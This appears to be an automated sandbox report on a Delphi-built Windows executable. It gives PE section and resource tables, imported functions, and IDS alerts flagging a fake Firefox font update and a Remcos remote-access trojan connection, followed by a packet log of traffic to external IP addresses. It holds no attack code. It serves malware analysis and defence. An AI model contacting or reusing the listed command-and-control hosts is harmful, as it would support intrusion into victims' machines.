                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x6e60c0x6e8007f88a60478da2b59059ac9020a731125False0.5148804263291855data6.52663869684443IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .itext0x700000x8740xa001d2f13587195bd07d0eacaf37f6bce18False0.53359375data5.614686748854788IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .data0x710000x1ddc0x1e0064398b74c9b81658dc6c1c0840194ed3False0.40924479166666666data3.912605066546787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .bss0x730000x37000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .idata0x770000x2a880x2c00e6a0c30232a0c925db3f0b1f9f0c28e7False0.3114346590909091data5.108538589937939IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .tls0x7a0000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rdata0x7b0000x180x200c82cfd34222b3044514069e79ad6ba11False0.05078125data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x7c0000x7c480x7e002d8e689e68215d8c5822f613430c661eFalse0.6173735119047619data6.676175097423695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x840000xd0c000xd0c0051d994c39d421963d0ef160af1c8cab1False0.5735380800898203data7.474931732078971IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_CURSOR0x853340x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                            RT_CURSOR0x854680x134dataEnglishUnited States0.4642857142857143
                                                            RT_CURSOR0x8559c0x134dataEnglishUnited States0.4805194805194805
                                                            RT_CURSOR0x856d00x134dataEnglishUnited States0.38311688311688313
                                                            RT_CURSOR0x858040x134dataEnglishUnited States0.36038961038961037
                                                            RT_CURSOR0x859380x134dataEnglishUnited States0.4090909090909091
                                                            RT_CURSOR0x85a6c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                            RT_BITMAP0x85ba00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                            RT_BITMAP0x85d700x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                            RT_BITMAP0x85f540x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                            RT_BITMAP0x861240x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                            RT_BITMAP0x862f40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                            RT_BITMAP0x864c40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                            RT_BITMAP0x866940x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                            RT_BITMAP0x868640x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                            RT_BITMAP0x86a340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                            RT_BITMAP0x86c040x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                            RT_BITMAP0x86dd40x7dab0Device independent bitmap graphic, 942 x 182 x 24, image size 514696EnglishUnited States0.6317840601784216
                                                            RT_BITMAP0x1048840x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.39864864864864863
                                                            RT_BITMAP0x1049ac0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                                                            RT_BITMAP0x104ad40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                                                            RT_BITMAP0x104bfc0xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
                                                            RT_BITMAP0x104ce40x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3614864864864865
                                                            RT_BITMAP0x104e0c0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                                                            RT_BITMAP0x104f340xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.49038461538461536
                                                            RT_BITMAP0x1050040x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3716216216216216
                                                            RT_BITMAP0x10512c0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.2905405405405405
                                                            RT_BITMAP0x1052540x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.38175675675675674
                                                            RT_BITMAP0x10537c0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                                                            RT_BITMAP0x1054a40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                                                            RT_BITMAP0x1055cc0xe8Device independent bitmap graphic, 12 x 16 x 4, image size 128EnglishUnited States0.3620689655172414
                                                            RT_BITMAP0x1056b40x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
                                                            RT_BITMAP0x1057dc0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.375
                                                            RT_BITMAP0x1059040xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
                                                            RT_BITMAP0x1059d40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.36824324324324326
                                                            RT_BITMAP0x105afc0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
                                                            RT_BITMAP0x105c240x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                                                            RT_BITMAP0x105d4c0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.375
                                                            RT_BITMAP0x105e740x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.375
                                                            RT_BITMAP0x105f9c0xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
                                                            RT_BITMAP0x1060840x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.35135135135135137
                                                            RT_BITMAP0x1061ac0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.36486486486486486
                                                            RT_BITMAP0x1062d40xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
                                                            RT_BITMAP0x1063a40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
                                                            RT_BITMAP0x1064cc0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
                                                            RT_BITMAP0x1065f40xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                            RT_ICON0x1066dc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 1889 x 1889 px/m0.30230496453900707
                                                            RT_ICON0x106b440x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m0.1942622950819672
                                                            RT_ICON0x1074cc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m0.1676829268292683
                                                            RT_ICON0x1085740x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m0.11058091286307054
                                                            RT_ICON0x10ab1c0x178bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9465737514518002
                                                            RT_DIALOG0x10c2a80x52data0.7682926829268293
                                                            RT_DIALOG0x10c2fc0x52data0.7560975609756098
                                                            RT_STRING0x10c3500x160data0.4460227272727273
                                                            RT_STRING0x10c4b00x38cTarga image data - Color 99 x 107 x 32 +68 +111 "z"0.44162995594713655
                                                            RT_STRING0x10c83c0x1ccdata0.558695652173913
                                                            RT_STRING0x10ca080xccdata0.6764705882352942
                                                            RT_STRING0x10cad40x114data0.6086956521739131
                                                            RT_STRING0x10cbe80x350data0.43514150943396224
                                                            RT_STRING0x10cf380x3bcdata0.3817991631799163
                                                            RT_STRING0x10d2f40x370data0.4022727272727273
                                                            RT_STRING0x10d6640x3ccdata0.33539094650205764
                                                            RT_STRING0x10da300x214data0.49624060150375937
                                                            RT_STRING0x10dc440xccdata0.6274509803921569
                                                            RT_STRING0x10dd100x194data0.5643564356435643
                                                            RT_STRING0x10dea40x3c4data0.3288381742738589
                                                            RT_STRING0x10e2680x338data0.42961165048543687
                                                            RT_STRING0x10e5a00x294data0.42424242424242425
                                                            RT_RCDATA0x10e8340x10data1.5
                                                            RT_RCDATA0x10e8440x340data0.6899038461538461
                                                            RT_RCDATA0x10eb840x35b08GIF image data, version 89a, 600 x 300EnglishUnited States0.6345128960675179
                                                            RT_RCDATA0x14468c0x10463Delphi compiled form 'TfMain'0.12409427084114673
                                                            RT_GROUP_CURSOR0x154af00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                            RT_GROUP_CURSOR0x154b040x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                            RT_GROUP_CURSOR0x154b180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                            RT_GROUP_CURSOR0x154b2c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                            RT_GROUP_CURSOR0x154b400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                            RT_GROUP_CURSOR0x154b540x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                            RT_GROUP_CURSOR0x154b680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                            RT_GROUP_ICON0x154b7c0x4cdata0.8289473684210527

                                                            Imports

                                                            DLLImport
                                                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                            user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                            kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                            user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExA, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                            gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetArcDirection, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, FillRgn, ExcludeClipRect, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateEllipticRgnIndirect, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, CloseEnhMetaFile, BitBlt
                                                            version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                            kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, QueryDosDeviceA, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVolumeInformationA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                            oleaut32.dllGetErrorInfo, SysFreeString
                                                            ole32.dllCreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                                                            kernel32.dllSleep
                                                            oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                            comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-12-19T08:00:24.178681+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749710103.82.231.117443TCP
                                                            2024-12-19T08:00:30.775132+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749725185.174.103.1112404TCP
                                                            2024-12-19T08:00:33.888987+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.749736178.237.33.5080TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 19, 2024 08:00:22.334625959 CET49709443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:22.334697008 CET44349709103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:22.334774971 CET49709443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:22.343753099 CET49709443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:22.343849897 CET44349709103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:22.343904018 CET49709443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:22.434791088 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:22.434844017 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:22.434932947 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:22.477561951 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:22.477596998 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:24.178611994 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:24.178680897 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:24.182118893 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:24.182132006 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:24.182411909 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:24.231065035 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:24.285278082 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:24.331337929 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.011461020 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.062093019 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.259005070 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.259021044 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.259042025 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.259051085 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.259078979 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.259092093 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.259110928 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.259135008 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.259161949 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.319042921 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.319056988 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.319092989 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.319114923 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.319133043 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.319175959 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.319175959 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.519511938 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.519540071 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.520071030 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.520101070 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.520176888 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.556188107 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.556222916 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.556380987 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.556401014 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.556456089 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.599661112 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.599689007 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.599973917 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.599991083 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.600104094 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.746712923 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.746798038 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.746882915 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.746912956 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.746953011 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.746953011 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.767029047 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.767097950 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.767169952 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.767189980 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.767240047 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.767240047 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.782567024 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.782618999 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.782753944 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.782753944 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.782776117 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.782840967 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.798125029 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.798182964 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.798341990 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.798341990 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.798377037 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.798490047 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.813539028 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.813608885 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.813771009 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.813771009 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.813795090 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.814835072 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.860404015 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.860434055 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.860568047 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.860569000 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.860596895 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.862843990 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.940372944 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.940407991 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.940502882 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.940502882 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.940534115 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.942754030 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.988445997 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.988502026 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.988588095 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.988588095 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.988614082 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.988706112 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.995989084 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.996036053 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.996090889 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.996121883 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.996140003 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.996226072 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.004549026 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.004595041 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.004684925 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.004684925 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.004700899 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.004739046 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.011533022 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.011580944 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.011704922 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.011704922 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.011715889 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.011837959 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.020104885 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.020163059 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.020241976 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.020241976 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.020251989 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.020365000 CET49710443192.168.2.7103.82.231.117
